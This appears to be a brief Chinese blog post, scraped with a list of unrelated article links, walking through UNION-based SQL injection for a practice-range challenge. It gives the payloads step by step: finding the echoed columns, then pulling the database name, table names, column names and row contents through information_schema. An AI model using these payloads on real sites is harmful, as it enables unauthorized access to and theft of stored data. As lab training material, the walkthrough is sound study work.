当前位置: 首页 > news >正文

简单的sql注入方法

简单的sql注入方法


对应题目好靶场平台-安全靶场-网络安全靶场

2025-09-09-11-44-39-image

 1 union select 1,2,3,4,5。。。

发现回显

然后确定数据库名

1 union slect 1,2,database(),4,5

之后获取表名

1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema='数据库名' -- 

获取字段名

1 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema='数据库名' and table_name='表名' -- 

获取内容

1 union select 1,字段(可以使用16进制过滤),3,4,5 from 数据库.表 -- 

其他sql注入大致如此

http://www.gsyq.cn/news/725.html

相关文章:

  • socket重定义错误
  • 实用的软件
  • 使用-Jest-测试-VueJS-组件-全-
  • 基于C#实现照片条形码识别
  • 虚拟内存不足怎么解决?虚拟内存不足的原因及解决方法
  • Tekla门钢边柱节点源码
  • 由于裁剪的图片较小
  • 周总结报告6
  • ubuntu22.04安装cuda11.8+python3.12+pytorch2.6.0
  • 自己改造的一个ES的Reindex开源工具
  • CF1379
  • 备战软考4
  • P11364 [NOIP2024] 树上查询
  • pb9新建“项目”选项卡中文说明
  • 场论笔记(一)哈密顿算子的总结
  • PDF处理控件Aspose.PDF教程:使用 Python 将 PDF 转换为 Base64
  • IronOCR 2025.9 重磅发布:内存优化突破,TIFF文档处理内存占用可降低98%!
  • 81、核对两个表格或者核对两个表格中的其中一例数据
  • Linux内核空间与用户空间详解
  • Stable Diffusion 入门:不用本地部署也能轻松上手体验
  • 我的linux之路
  • 前端-支付宝小游戏开发接入指南
  • 打折代码
  • pb9对象中文说明
  • AIGEO重塑商业新规则
  • MySQL常见存储引擎
  • 【URP】UnityHLSL顶点片元语义详解
  • 跨网文件交换系统案例分享:金融、半导体制造、医院统统都有!
  • 尚硅谷后台管理系统
  • 第二届人工智能与自然语言处理国际学术会议(AINLP 2025)